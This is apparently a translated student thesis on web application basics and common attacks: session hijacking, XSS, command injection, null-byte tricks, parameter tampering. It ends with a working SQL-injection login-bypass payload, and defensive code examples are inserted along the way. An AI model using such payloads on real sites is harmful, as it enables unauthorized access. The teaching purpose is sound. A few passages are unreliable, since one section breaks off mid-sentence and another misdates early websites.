Thesis: Web Application Attacks and Security
8/3/2019 Thesis: Web Application Attacks and Security
1/55
Thesis: Web applications and the security problem. Supervisor: Mr. Huỳnh Nguyễn Thành Luân
PREFACE
In today's era the internet has become very familiar and is a tool used by everyone, whether a country presenting its image or simply the personal web page of someone introducing themselves. All of this drives the continuous development of web applications, and gradually the concept of a web application has become common. As web applications have become popular and widely deployed on the internet, attacks on web applications have also grown extremely sophisticated. This raises the urgent question of how to guarantee information security for web applications and for their users' information. The specialist concepts of web applications and web application attacks have also become more common in the professional literature. Tools that help web programmers and network administrators find vulnerabilities in web applications have appeared, but they do not keep pace with the dizzying speed at which web applications evolve toward being faster and prettier, and of course they cannot completely prevent attacks on web applications, as attacks grow ever more varied and thoroughly exploit the mistakes of the web application, of the administrator, or of the web application programmer.
Statistics show that 75% of internet attacks are attacks on web applications, and they cause enormous damage; therefore studying web application attacks is very necessary, and finding ways to prevent attacks and secure web applications effectively has become an urgent requirement.
Since this is an inevitable trend of the times, studying and researching web applications will help a great deal for new web programmers, or for new administrators with little experience in managing their own network systems, in preventing or
Student: Nguyễn Văn Đại
remedying the flaws of web applications. This thesis is carried out with the aim of introducing web applications more clearly in order to avoid confusion, and at the same time of studying the common web application attacks in order to find suitable ways of preventing them and securing web applications.
Acknowledgements
I would like to thank the Faculty of Information Technology of Công Thương College for creating favourable conditions for me to complete this thesis.
I thank Mr. Huỳnh Nguyễn Thành Luân and the lecturers of the Faculty of Information Technology for their dedicated guidance, for providing materials and for helping me carry out this thesis.
Table of Contents
My thesis has the following parts:
Introduction to the thesis
Chapter 1: General overview of web applications
Chapter 2: Related terms and concepts
Chapter 3: Brief introduction to some basic web application attacks
Chapter 4: How to use some common tools
Conclusion and future directions of the thesis
CHAPTER 1: GENERAL OVERVIEW OF WEB APPLICATIONS
1.1 The concept of a web application (website widget or web application)
In more technical terms, web applications can be explained as querying a server that holds content (mostly a database storing the content) and generating dynamic web documents to serve the requests of clients (that is, the website's users). The documents are generated in a standard format supported by all browsers (such as HTML or XHTML). JavaScript is a form of client-side script that allows dynamic elements on each page (such as changing an image each time the user moves the mouse over it). The web browser is the key: it interprets and runs all the scripts and commands when displaying the requested page and content.
From a functional point of view, web applications are computer programs that let website users log in and query, enter and retrieve data over the Internet in their favourite web browser. The data is sent to the user's browser as dynamic information (in a particular format, for example HTML styled with CSS) from the web application through a web server.
To fully understand the meaning of this concept, let us look more closely at the structural model, the functions and the tasks of a web application.
1.2 Structure, functions, interface and basic operating principles of a web application
1.2.1 Basic structure of a web application
The model of a simple web application is the MVC (Model - View - Controller) model.
Model layer: contains the code that connects to the database and queries, inserts, deletes and updates data.
View layer: contains the code that builds the interface the user interacts with, that is, how the data is drawn.
Controller layer: contains the flow-control code that links the Model layer and the View layer together.
Dividing the application into layers like this increases reuse and makes it easy to extend. For instance, if we want the application to be accessible on mobile devices, we only need to create a new view layer for mobile, while the model and controller layers stay unchanged. Or if we want to change the database, that is also easier: we only create a new model layer, and the view and controller parts are not affected.
The model showing the relationship of the three layers in a web application:
Figure 1. The 3-layer model of a web application
And here is the model of a web application service:
Figure 2. A simple web application service model
- Presentation layer: used to communicate with the user; its main task is displaying data and receiving data from the user.
- Business Logic layer: its main task is providing the functions of the software.
- Data layer: stores data and lets the Business Logic layer search, extract and update data.
1.2.2 The interface of a web application
The web interface places very few limits on what the user can do. Through Java, JavaScript, DHTML, Flash and other technologies, methods that used to belong only to desktop applications, such as drawing on the screen, playing music, and using both keyboard and mouse, can all be carried out. Common techniques such as drag and drop are also supported by these technologies.
Web developers usually use client-side scripting languages to add more effective features, especially to create a sense of visual interaction without having to reload the page (which many users find disruptive). Recently, technologies have been developed to combine client-side scripting languages with server-side technologies such as PHP. Ajax, a web development technique that combines several different technologies, is an example of a technology that is currently creating ever more interactive experiences.
1.2.3 Basic functions of web applications
Web applications are popular thanks to the availability of a program anywhere. The ability to update and maintain a web application without distributing and installing software on thousands of computers is the main reason for their popularity. Web applications are used to implement webmail, online shops, online auctions, wikis, discussion forums, weblogs, MMORPGs, customer relationship management systems and many other functions.
The web is also a smart sales channel for thousands of organisations and businesses, large and small. With over one billion Internet users today (source: Computer Industry Almanac 2006), US e-commerce used about 102 billion dollars in 2006 for transactions (source: comScore Networks 2007).
All such data needs to be packaged, stored, processed and transmitted in some way, for use immediately or on some later day. Web applications, in the areas of registration, submission, querying, login, sales and content
management systems are precisely the website widgets that let all this desired work be done.
The web is the basic element that helps a business strengthen its online image in the networked world, creating and maintaining many relationships that bring long-term profit with prospective and existing customers.
There is no doubt that web applications have become ubiquitous all over the world. But because of their highly technical nature and their naturally complex composition, not many people know them accurately, and they are even seriously misunderstood in busy daily life.
Today's websites are far from the static graphics and text of the nineteenth century or earlier. Modern web pages let users download dynamic content personalised to their own settings and preferences. Furthermore they can also run scripts on the client machine, which can turn the Internet browser into an interface for applications such as e-mail or interactive mapping software (Yahoo Mail, Google Maps).
Most importantly, modern websites allow sensitive customer data (such as personal information, credit card numbers, social security information) to be packaged, processed, stored and transmitted for immediate or later periodic use. And this is done through web applications. They may be the webmail (e-mail) component, the login page, the support program and product request form, the shopping feature, or the content management system; modern website development provides businesses with the means they need to communicate with future and existing customers.
1.2.4 Basic operating principle of a web application
In the earlier client-server computing model, each application had its own client program that served as the user interface and had to be installed separately on each user's personal computer. An upgrade of the server part of the application would require
Step 1: The browser creates an HTTP request and sends it to the web application.
Step 2: The main controller of Struts, the ActionServlet class, catches this request, parses its URL and, based on the struts-config.xml file, sends the request to the corresponding Action class.
Step 3: Action is a class of the Struts framework. Our application usually extends this class and writes the code that handles the corresponding business logic. For instance, we would have a LoginAction to handle user login and logout.
Step 4: The Action class may read from and update the database if necessary.
Step 5: When the Action class has finished the business processing, it sends a forward/redirect request, together with data (if any), back to the controller.
Step 6: The controller passes control to the corresponding JSP page in the view layer. If this JSP page uses data, the controller supplies it (this is the data the action produced and handed to the controller).
Step 7: Once the JSP page is ready, the controller creates an HTTP response and sends it back to the browser, which displays it on screen.
1.2.5 The security problem of web applications
As web applications develop very quickly in every respect and are widely deployed, security for web applications receives more attention. Although today's significant improvements cannot be denied, security problems in web applications keep increasing. The cause may lie in unsuitable code. Many serious weaknesses or vulnerabilities let a hacker break straight in and reach the database to collect sensitive data. Many databases contain valuable information (such as personal details and financial information), which makes them a frequent target of most hackers. Although attacks that
deface business websites still happen regularly, hackers now prefer to increase their access to sensitive data held on the database server because of the huge profits that trading the data brings.
Figure 3. Operating model of a web application
In the operating framework described above, you can see how easy it is for a hacker, with a little creativity, to quickly reach information held in the database. With more luck they may come across a vulnerability caused by carelessness or user error in the web application.
As mentioned, websites depend on the database to deliver the requested information to users. If the web application is insecure (for example it has a vulnerability or is subjected to some hacking technique), the entire database holding sensitive information is in serious danger.
Some hackers can insert malicious code into a vulnerable web application to deceive users and lead them to a phishing website. This technique is called Cross-site Scripting and can be used even when the web server itself and the database host have no vulnerability at all.
A recent study shows that 75% of network attacks are carried out at the web application level. Websites and their related web applications must always be available 24/7 to provide services on demand to customers, staff, suppliers and many other parties.
Firewalls and SSL cannot protect a web application from every hacking activity, simply because access to the website must be public so that anyone can visit it. All modern database systems (such as Microsoft SQL Server, Oracle, MySQL) can be reached through certain specific ports (such as ports 80 and 443). If they want, someone can connect directly to the database effectively once they have bypassed the operating system's security mechanism. These ports are open to allow legitimate network traffic, and therefore they also form a large and dangerous hole.
Web applications usually access back-end data such as the customer database, controlling valuable data, and are therefore very hard to make absolutely secure. Data access here usually goes through scripts that package and transmit the data. If a hacker notices a weakness in a script, he can easily redirect the traffic elsewhere and illegally disclose users' personal details, even when the application never intended to do so.
Most web applications are custom-built and therefore receive fewer qualified reviews than packaged software of the same kind. Custom applications are consequently more prone to attack. A web application can be said to be a gateway to the database, especially a custom one. They are not developed with the best security level and do not go through the usual security testing. In general, you need to answer the questions: "Which part of the website do we think is secure but actually opens the door to attacks?" and "What data can we feed into an application to make it do things it should not?" That is the job of web vulnerability scanning software.
Today hackers have many ways to attack a web application, from basic techniques to techniques requiring high skill and advanced technology. Supporting tools
are appearing in ever greater numbers, helping network administrators a great deal to find basic vulnerabilities and bugs in time, but at the same time they are a double-edged sword. Hackers can use these tools to discover the vulnerabilities of a web application and from there find the corresponding attack on those vulnerabilities, causing a great deal of damage. Therefore the study of current attack techniques and basic tools is an essential need in the study of web application security.
CHAPTER 2: RELATED TERMS AND CONCEPTS
2.1 Common concepts and terms
2.1.1 General concepts of web applications
A web browser is a software application that lets users query data and interact with the content held on the web pages within a website.
Web pages were static: the user requests some resource, and the server returns that resource. Web pages were nothing more than formatted, distributed text. For browsers, static web pages were not a difficult problem, since at first web pages only carried information about events, addresses or schedules over the Internet; there was no interaction through web pages yet.
"Dynamic" web is the term used for websites backed by web-based software, or more precisely a program that runs over the HTTP protocol. In essence, a dynamic website is a static website "combined" with web software (application modules for the web). With this software the website owner actually has the power to operate it, editing and updating the information on their website without having to rely on professionals.
A domain name is the identifier of a website on the Internet. The domain name is usually tied to the company name and the business's brand. A domain name is unique and is allocated to whichever entity registers it first.
+ There are two kinds of domain name:
- International domain names of the form www.tencongty.com (.net, .biz, .org, .info...)
- National domain names of the form www.tencongty.com.vn (or .net.vn, .biz.vn, .org.vn, .gov.vn...)
- Web hosting is space on a server that runs Internet services such as FTP and WWW, where you can store the content of your web pages or your data. The reason you must rent web hosting to hold your web content, mail and FTP services is that those machines always have a fixed address when connected to the Internet (an IP address), whereas if you access the Internet in the usual way today through ISPs (Internet Service Providers), the IP address of your machine keeps changing, so the data on your machine cannot be reached from other machines on the Internet.
2.1.2 Terms and concepts for the tools related to web applications
CGI: The first solution for making web pages dynamic was the Common Gateway Interface (CGI). CGI lets programs run when the user sends a request. Suppose we need to display the items on sale on a website: with a CGI script we can access the product database and display the results. Using simple HTML forms and CGI scripts, we can build virtual shops that sell products to customers through a browser. CGI scripts can be written in a number of languages, from Perl to Visual Basic.
However, CGI is not a safe way to build dynamic web pages. With CGI, other people can run programs on the system, and therefore unwanted programs may be run that damage the system. Even so, CGI is still in use today.
Applet: In May 1995, John Gage of Sun and Andreessen (now of Netscape Communications Corporation) announced a new programming language called
Java. Netscape Navigator supported this new language, a new road for dynamic web pages was opened, and the era of the applet began.
Applets let developers write small applications embedded in a web page. When a user uses a browser that supports Java, they can run the applets in the browser on the Java Virtual Machine (JVM). Although applets can do many things, they also have some drawbacks: they are usually blocked from reading and writing system files, cannot load libraries, and sometimes cannot execute on the client side. To compensate for these restrictions, applets run in a sandbox security model that protects the user from dangerous code. There were times when applets were used heavily, but they also had problems: the dependence on the JVM, since applets only execute when a suitable environment is installed on the client, and moreover applets are relatively slow, so applets were not the optimal solution for the dynamic web.
JavaScript: At the same time, Netscape created a scripting language called JavaScript. JavaScript was designed to make development easier for web designers and programmers who were not fluent in Java. (Microsoft also had a scripting language called VBScript.) JavaScript immediately became an effective way to build dynamic web pages.
Treating pages as objects gave rise to a new concept called the Document Object Model (DOM). At first JavaScript and the DOM were tightly coupled, but later they were separated. The DOM is entirely an object-oriented representation of the web page, and it can be modified with any scripting language such as JavaScript or VBScript.
The World Wide Web Consortium (W3C) standardised the DOM, while the European Computer Manufacturers Association (ECMA) approved JavaScript as the ECMAScript specification.
JSP/Servlet, ASP and PHP: Along with Java, Sun also introduced a new technology called the servlet. The Java code does not run on the client as with applets; it
runs in a server-side application. Servlets also play the role of CGI scripts. The servlet was a step forward: it provided an API library in Java and a complete library for working with the HTTP protocol.
JavaServer Pages (JSP) is a web programming technology from Sun; alongside it is a competing technology from Microsoft, Active Server Pages (ASP). JSP requires a server that understands Java. Microsoft studied the drawbacks of servlets and created ASP to make designing dynamic web pages easier. Microsoft added very powerful toolsets and very smooth integration with its web servers. JSP and ASP have similarities: both were designed to separate the processing from the presentation. There are technical differences, but both let web designers concentrate on the layout while software developers concentrate on the programming logic.
Flash: In 1996, FutureWave released FutureSplash Animator. FutureWave was later acquired by Macromedia, which released Flash. Flash lets designers build animated and dynamic applications. Flash does not demand advanced programming skills and is very easy to learn. Like many other solutions, Flash requires client-side software, such as the Shockwave Player plug-in, which may be integrated in some operating systems or browsers.
DHTML: When Microsoft and Netscape released version 4 of their browsers, web developers had a new option: Dynamic HTML (DHTML). DHTML is not a W3C standard; it is more like a commercial toolkit. In practice it is a combination of HTML, Cascading Style Sheets (CSS), JavaScript and the DOM. This combination of technologies lets developers modify the content and structure of a web page quickly. However, DHTML requires support from the browsers. Although both Internet Explorer and Netscape support DHTML, their implementations differ, so developers need to know which browser the client is using. DHTML is a real step forward,
but it still needs some development standards. Today DHTML is still developing strongly.
XML: Since its birth in the mid-1990s, the W3C's eXtensible Markup Language (XML), a derivative of SGML, has become very popular. XML is present everywhere; Microsoft Office 12 will also support XML file formats. Today we have many XML derivatives for web applications (including, of course, XHTML): Mozilla's XUL; XAMJ, an open-source Java-based product; MXML from Macromedia; and Microsoft's XAML.
2.1.3 Concepts and terms related to web application attacks and security
2.1.3.1 The concept of a hacker
The concept of the hacker has existed since the 1950s and 1960s of the last century, and after a fairly long period of development hackers are today divided into 4 kinds:
- White-hat hackers: programming experts who look for software flaws in order to fix them and build more secure systems.
- Black-hat hackers: the opposite of white hats, hackers who cause damage and profit for themselves.
- Blue-hat hackers/samurai: talented programming experts invited by companies such as Microsoft to work on finding bugs in their software.
- Grey-hat or brown-hat hackers: people who sometimes do the work of white hats but still do the work of black hats.
- Whichever group they claim to belong to, they are still breaking into systems through security holes. Therefore I will use the term "hacker" for those who attack web applications.
2.1.3.2 HTTP HEADER
HTTP headers are the leading fields that carry the operating parameters of an HTTP exchange between server and client. The information the client sends to the server is called an HTTP request, and the information the server sends to the client is called an HTTP response. The header fields define the various characteristics of the requested data transfer or of the data supplied in the message. HTTP headers can take many forms and usually begin with the field name, terminated by a colon, followed by the field value. Field names and values may be any application-specific string, but the core set of fields is standardised by the Internet Engineering Task Force. Some parameters are used both in the client and in the server.
- (A table listing the parameters is at the end of the thesis.)
2.1.3.3 SESSION
HTTP is a stateless object-oriented protocol; it does not store the working state between server and client. This makes it hard to manage some web applications, because the server does not know what state the client was in before. To solve this problem, the concept of the session was added to the HTTP protocol. The session ID is a string that authenticates the session. Some servers allocate a session to the user when they view a web page on the server.
- To maintain the session, the session ID is usually stored in:
+ a variable in the URL
+ a hidden form variable
+ a cookie
- The session only exists for an allowed period of time, set on the server or by the running application. The server automatically releases the session to reclaim system resources.
2.1.3.4 COOKIE
A cookie is a small piece of structured data shared between the server and the user's browser.
Cookies are stored as small text-format data files, created by the application to store, track and recognise users who visit the website and the areas they pass through on the site. This information may include user information, account and password; the cookie is accepted by the user's browser and stored on their hard disk. Many browsers do not store cookies automatically but depend on whether the user agrees to store them.
On later visits to the website, the application can reuse the information in the cookie (the related account information) without the user having to log in or provide any further information.
There are many ways to classify cookies. By the party that sets the cookie, cookies fall into 2 kinds: first-party cookies are set by the domain of the page listed in the address bar; third-party cookies come from other domains whose items, such as advertisements or images, are embedded in the page. There is also another division into 4 kinds, based on secure/non-secure and persistent/non-persistent, giving us:
- Persistent and Secure
- Persistent and Non-Secure
- Non-Persistent and Secure
- Non-Persistent and Non-Secure
Persistent cookies are stored as .txt files (for example Netscape Navigator stores cookies in a single cookie.txt file, while Internet Explorer stores them as several *.txt files with one cookie per file) on the client machine for a defined period of time.
Non-persistent cookies are stored in the client's RAM and are destroyed when the web page is closed or when a destroy command is received from the web page.
Secure cookies can only be sent over HTTPS (SSL).
Non-secure cookies can be sent over either HTTPS or HTTP.
In essence, for a secure cookie the server provides a secure transfer mode.
The components of a cookie are:
1. Domain: the domain name of the website that created the cookie (in the example above).
2. Flag: TRUE/FALSE - determines whether other machines with the same domain name may access the cookie.
3. Path: the range of addresses that may access the cookie. For example, if the path is /tracuu, then addresses in the /tracuu directory and all its subdirectories such as /tracuu/baomat may access this cookie. If the value is /, the cookie may be accessed by every address under the domain of the site that created the cookie.
4. Secure: TRUE/FALSE - determines whether this is a secure cookie, that is, whether the connection uses SSL.
5. Expiration: the cookie's expiry time, counted in seconds since 00:00:00 GMT on 01/01/1970. If this value is not set, the browser treats it as a non-persistent cookie kept only in RAM and deletes it when the browser is closed.
6. Name: the variable name (in this case Apache).
7. Value: with the cookie created above, the value of Apache is 64.3.40.151.16018996349247480 and the expiry date is 27/07/2006, for the domain http://www.redhat.com.
- Netscape (NS) cookies are kept in a file Cookies.txt, at the path
C:\Program Files\Netscape\Users\UserName\Cookies.tx
- IE cookies are stored as several files, each file being one cookie, placed in [C:]\Documents and Setting\[username]\Cookies (Win2000); on Win9x the cookies directory is in [C:]\Windows\cookies.
- The maximum size of a cookie is 4 KB. The maximum number of cookies per domain is 20.
A cookie destroyed as soon as the browser is closed is called a session cookie.
You need to know about and configure cookies, because cookies can let websites track your navigation while you browse.
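To make the seven cookie components concrete, here is an added example (not code from the thesis) that parses lines in the Netscape cookies.txt layout described above and reports which properties widen a cookie's exposure: non-secure, persistent, shared across hosts, site-wide path, or over the 4 KB limit. The sample file is constructed; its Apache line is based on the name, value and domain quoted above, with an expiry timestamp chosen to fall on 27/07/2006, and the "now" timestamp is an assumption for the demo.

```javascript
'use strict';

// Field order of one Netscape cookies.txt line (tab separated), matching the
// seven components listed above.
const FIELDS = ['domain', 'flag', 'path', 'secure', 'expiration', 'name', 'value'];

// Parse one cookies.txt line. Returns null for comments and blank lines,
// throws on a line that does not have exactly seven fields.
function parseNetscapeCookieLine(line) {
  const trimmed = line.trim();
  if (trimmed === '' || trimmed.startsWith('#')) return null;
  const parts = line.split('\t');
  if (parts.length !== FIELDS.length) {
    throw new Error(`expected ${FIELDS.length} tab-separated fields, got ${parts.length}`);
  }
  const [domain, flag, path, secure, expiration, name, value] = parts;
  const expires = Number(expiration);
  if (!Number.isInteger(expires) || expires < 0) {
    throw new Error(`bad expiration "${expiration}"`);
  }
  return {
    domain,
    sharedAcrossHosts: flag === 'TRUE', // TRUE: every host under the domain may read it
    path,
    secure: secure === 'TRUE',          // TRUE: only sent over HTTPS
    expires,                            // seconds since 00:00:00 GMT on 01/01/1970
    persistent: expires > 0,            // 0: no expiry set, kept in RAM until the browser closes
    name,
    value,
  };
}

// Properties that widen the cookie's exposure. `now` is a Unix timestamp in
// seconds, passed in rather than read from the clock so results are repeatable.
function auditCookie(cookie, now) {
  const findings = [];
  if (!cookie.secure) findings.push('non-secure: may travel over plain HTTP');
  if (cookie.persistent) {
    const days = Math.ceil((cookie.expires - now) / 86400);
    findings.push(days > 0 ? `persistent: on disk for ${days} more day(s)` : 'persistent but expired');
  }
  if (cookie.sharedAcrossHosts) findings.push(`domain cookie: readable by every host under ${cookie.domain}`);
  if (cookie.path === '/') findings.push('path /: sent with every request to the site');
  if (Buffer.byteLength(`${cookie.name}=${cookie.value}`) > 4096) findings.push('over the 4 KB cookie limit');
  return findings;
}

// Audit a whole file; returns { cookieName: [findings] }.
function auditCookieFile(text, now) {
  const report = {};
  for (const line of text.split('\n')) {
    const cookie = parseNetscapeCookieLine(line);
    if (cookie) report[cookie.name] = auditCookie(cookie, now);
  }
  return report;
}

// Constructed sample file. The Apache line reuses the name and value quoted in
// the text; 1153958400 is 27/07/2006 00:00:00 GMT. The second line is a
// Secure session cookie scoped to one path, for contrast.
const SAMPLE_COOKIES_TXT = [
  '# Netscape HTTP Cookie File',
  ['.redhat.com', 'TRUE', '/', 'FALSE', '1153958400', 'Apache', '64.3.40.151.16018996349247480'].join('\t'),
  ['secure.example.test', 'FALSE', '/account', 'TRUE', '0', 'SESSIONID', 'constructed-session-id'].join('\t'),
].join('\n');

// Assumed "now" for the demo: 1150000000 is 11/06/2006, about 46 days before expiry.
const DEMO_NOW = 1150000000;

console.log(JSON.stringify(auditCookieFile(SAMPLE_COOKIES_TXT, DEMO_NOW), null, 2));
```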
2.1.3.5 PROXY
A proxy gives users Internet access for a specific protocol or a set of protocols executed on a dual-homed host or bastion host. The user's client programs go through the intermediary proxy server instead of the real server the user wants to communicate with.
The proxy server examines the requests from the client and decides whether or not to serve them; if a request is served, the proxy server connects to the real server on behalf of the client and continues to relay the client's requests to the server, as well as the server's replies to the client. The proxy server is therefore like an intermediary bridge between server and client.
CHAPTER 3: BASIC WEB APPLICATION ATTACK TECHNIQUES
A. Theory
1. WEB ACCESS CONTROL
Entering the system through a back door
During the design of an application, the application developers may install a back door so that they can later enter the system easily.
2. SESSION MANAGEMENT
2.1 Session Fixation
An attack technique that lets a hacker impersonate a legitimate user by sending a valid session ID to the user; after the user has logged in to the system successfully, the hacker reuses that session ID and naturally becomes the legitimate user.
2.2 Session Hijacking
An attack technique that lets a hacker impersonate a legitimate user after the victim has logged in to the system, by decoding their session ID stored in a cookie, a URL parameter or a hidden form field.
3. EXPLOITING FLAWS IN INPUT VALIDATION
Hackers take advantage of input fields to send arbitrary code that makes the system execute that code or breaks it completely.
3.1 Validating data with browser-side languages
(Client-Side validation)
Because browser-side languages (JavaScript, VBScript, ...) run in the browser, the hacker can modify the source and disable the checks.
3.2 Buffer Overflow
More data is sent to the application than the buffer allocated for it can hold, so the application no longer executes its intended next instruction but instead runs arbitrary code the hacker injected into the system. It is more serious still if the application is configured to run as root on the system.
3.3 URL Encoding
Abusing the standard encoding of special characters in URLs, the hacker encodes the illegal characters (the ones a script checks for) so that they pass through that check.
3.4 Meta-characters
Using special characters: the hacker can insert into the submitted data characters that have meaning inside a command string, such as those used in XSS or -- in SQL, in order to get a command executed.
3.5 Path Traversal
A method that abuses the file path in a URL, which the application resolves and returns to the browser, so that the hacker can read the content of any file on the system.
3.6 Cross-Site Scripting
This attack technique targets information on the user's computer rather than the server. By inserting an arbitrary piece of code (usually written in a scripting language such as JavaScript or VBScript), the hacker can steal sensitive information such as cookies and then, using what was stolen, pose as a legitimate user of the application. Cross-Site Scripting is therefore also a form of session hijacking.
3.7 OS Command Injection
The ability to execute system commands or code inserted through parameters that are not checked strictly, such as form parameters, cookies, HTTP request headers, and dangerous data inside files uploaded to the server. When this technique succeeds, the hacker can run system commands with the same privileges as the server process.
3.8 Null Characters
Character strings conventionally end with \0, and the hacker inserts that byte to fool the application: for applications built with a compiler such as C++, \0 is taken as the end of the string. Example: the hacker submits the string "tôi thứ nhất\0 alert(document.cookie)" in the input field. If the application uses a C++ routine to check the string, the string passes as valid, because C++ treats \0 as the end of the string and never examines what follows it.
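Sections 3.3, 3.4 and 3.8 describe three ways of slipping past a check that looks at the wrong representation of the input. The common fix is to canonicalize first (decode percent-encoding fully), then reject NUL bytes and meta-characters on the decoded value. The following Python example is added here and is not part of the thesis; the forbidden character set, the three-round decode bound and the sample inputs are constructed choices.

```python
from urllib.parse import unquote

# Added example (not the thesis's code). Covers sections 3.3, 3.4 and 3.8:
# decode percent-encoding fully before validating, reject NUL bytes, and
# reject shell/SQL/HTML meta-characters in fields that never need them.
# META_CHARS and MAX_DECODE_ROUNDS are constructed choices.

META_CHARS = frozenset("'\";<>|&`\\")
MAX_DECODE_ROUNDS = 3


def canonicalize(raw: str) -> str:
    """Percent-decode until the value stops changing, so a double-encoded
    %2527 ends up as the quote it really is before any check runs."""
    value = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of percent-encoding")


def c_strlen_view(value: str) -> str:
    """What a C-style strlen/strcmp based checker would see: everything after
    the first NUL byte is invisible to it (section 3.8)."""
    return value.split("\x00", 1)[0]


def validate_text_field(raw: str, max_len: int = 64) -> str:
    """Return the canonical value, or raise ValueError naming the reason."""
    value = canonicalize(raw)
    if "\x00" in value:
        raise ValueError("NUL byte in input")
    if "\r" in value or "\n" in value:
        raise ValueError("line break in input")
    bad = sorted(META_CHARS & set(value))
    if bad:
        raise ValueError(f"forbidden characters: {bad}")
    if len(value) > max_len:
        raise ValueError("input too long")
    return value


def classify(raw: str) -> str:
    """'ok' when the field is accepted, otherwise the rejection reason."""
    try:
        validate_text_field(raw)
        return "ok"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    for sample in ["alice", "%27--", "%2527", "first%00alert(document.cookie)"]:
        print(f"{sample!r:36} -> {classify(sample)}")
```

The order matters: a check that runs before decoding sees "%27" and lets the quote through, and a check that stops at the first NUL (as c_strlen_view shows) never sees the payload after it. For fields that must allow a quote (a surname such as O'Brien), the right control is not filtering but parameterized queries and output encoding, covered later under SQL injection.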
3.9 SQL Injection
In database programming, the programmer's failure to validate input values lets the hacker insert extra queries or invalid values and log into the system with ease.
3.10 Server side includes
The ability to insert system-level directives such as file inclusion (include file) or database access (jdbc) gives the hacker a chance to reach files and database contents that are normally not viewable on the web site.
3.11 Parameter manipulation
Information exchanged between the server and the browser is stored in variables such as URL parameters, hidden form fields, and cookies. Because control of these variables is not given enough attention, the hacker can modify their values to steal a user's session or change the price of an item.
3.12 Denial of service (DoS)
A large volume of requests is sent to the application within a short period, so that the system cannot keep up with them and collapses.
B. Ways of carrying out web application attacks
The previous part of this thesis gave an overview of the basic web application attacks. This part describes some basic and common attacks in more detail.
1. Parameter manipulation
Manipulating the transmitted parameters means altering important information carried in cookies, the URL, or hidden form fields. Cross-Site Scripting, SessionID, SQL Injection, Buffer Overflow and similar techniques also rely on these parameters to complete the hacker's attack steps. The transmitted parameters can be called the starting point for everything the hacker does while attacking an application. That is why they are covered first in this part, which also serves as a better foundation for the parts that follow.
1.1 MANIPULATING THE URL
1.1.1 Concept
When an HTML form is submitted, the result is sent in one of two ways: GET or POST. With GET, all variable names and their values appear in the URL string.
1.1.2 Countermeasures
To defend against modification of the URL string, the application can apply the following measure:
The application uses a hash table mechanism. After the user authenticates successfully with a username, the application generates a corresponding key. This key is stored on the server together with the username in the hash table object. Every time the user connects to the application, the key and username are sent along and compared
against the key and username held in the hash table. If they match the stored record, the request is valid; otherwise the server knows the user has modified the URL.
In addition, for valuable information, that information should be encrypted before it is displayed in the browser so that the hacker cannot modify it at will.
1.2 MANIPULATING HIDDEN FORM FIELDS
1.2.1 Concept
Information can be passed through a hidden form field (Hidden Form Field). Hidden form fields are not shown on the browser screen, but the user can find their content in "view source"; this is a weakness the hacker exploits by saving the page locally, changing its content, and submitting it to the server.
Besides changing the content of hidden fields, the hacker can also alter other elements of the form, such as the maximum length of an input field, in order to carry out a BUFFER OVERFLOW attack.
1.2.2 Some countermeasures
Use hidden form fields only to display data in the browser; never use the value of such a field in the application's own processing.
Use the HTTP_REFERER variable to check where a request comes from. However, the hacker can use a proxy to hide the real origin, so HTTP_REFERER should not be trusted too much as a check either.
Concatenate the names and values of the hidden fields into a single string. Use the MD5 algorithm or another one-way hash to digest that string and store the result in a hidden field called the "pattern string".
When the form values are submitted, the same operations are repeated with the same pre-agreed key. The result is then compared with the pattern string; if they do not match, the form values have been altered.
Use a sessionID to refer to information stored in the database.
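The "pattern string" countermeasure of 1.2.2 in working form, as an added Python example that is not the thesis's code. It uses HMAC-SHA256 with a server-side key where the thesis suggests MD5 over a chain that includes a key; the point is the same (a keyed one-way digest over every name=value pair), but HMAC is the construction designed for it. SERVER_KEY, the field names and the values are constructed for the demonstration.

```python
import hashlib
import hmac
import html
from typing import Dict, List

# Added example (not the thesis's code): the "pattern string" countermeasure
# from section 1.2.2 with HMAC-SHA256 in place of MD5. SERVER_KEY is a
# constructed value; in deployment it comes from configuration.

SERVER_KEY = b"constructed-demo-key-0123456789"
SIG_FIELD = "sig"


def _esc(text: str) -> str:
    """Escape the chain separators so 'a=b&c' as a value cannot collide
    with two separate fields named a and c."""
    return text.replace("%", "%25").replace("=", "%3D").replace("&", "%26")


def canonical_chain(fields: Dict[str, str]) -> bytes:
    """name=value pairs in sorted order; the signature field itself is skipped."""
    parts = [f"{_esc(name)}={_esc(fields[name])}"
             for name in sorted(fields) if name != SIG_FIELD]
    return "&".join(parts).encode()


def sign_fields(fields: Dict[str, str]) -> str:
    return hmac.new(SERVER_KEY, canonical_chain(fields), hashlib.sha256).hexdigest()


def render_hidden_inputs(fields: Dict[str, str]) -> List[str]:
    """The hidden inputs the server emits, including the pattern string."""
    tags = [f'<input type="hidden" name="{html.escape(n)}" value="{html.escape(v)}">'
            for n, v in sorted(fields.items())]
    tags.append(f'<input type="hidden" name="{SIG_FIELD}" value="{sign_fields(fields)}">')
    return tags


def verify_submission(submitted: Dict[str, str]) -> bool:
    """Recompute the signature over the posted fields and compare it in
    constant time; any edit to a name or a value makes this fail."""
    sig = submitted.get(SIG_FIELD)
    if sig is None:
        return False
    return hmac.compare_digest(sig, sign_fields(submitted))


if __name__ == "__main__":
    order = {"item": "42", "price": "1999"}
    print("\n".join(render_hidden_inputs(order)))
    posted = dict(order, sig=sign_fields(order))
    print("untouched:", verify_submission(posted))
    print("price edited:", verify_submission(dict(posted, price="1")))
```

Even with the signature in place, the advice at the top of 1.2.2 still holds: the price should be looked up server-side from the item id rather than trusted from the form, and the signature only proves the server emitted those exact values, not that the client is entitled to them.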
2 SQL Injection attack techniques
2.1 The simplest SQL injection technique
Its purpose is to bypass login forms.
Example 1: suppose the web application contains the following code:
    SQLQuery = "SELECT tkUsername FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"
    flag = GetQueryResult(SQLQuery)
    if flag = "" then
        check = FALSE
    else
        check = TRUE
    end if
This code checks the submitted Username and Password strings. If they exist in the User table, check=true; otherwise check=false.
Suppose the values entered are:
    Username: ' OR ''='
    Password: ' OR ''='
The SQL statement then becomes:
    SELECT tkUsername FROM User WHERE tkUsername='' OR ''='' AND Password='' OR ''=''
The comparison above is always true (because '' always equals ''). The condition in the WHERE clause is therefore always satisfied, and the username of the first row in the table is selected.
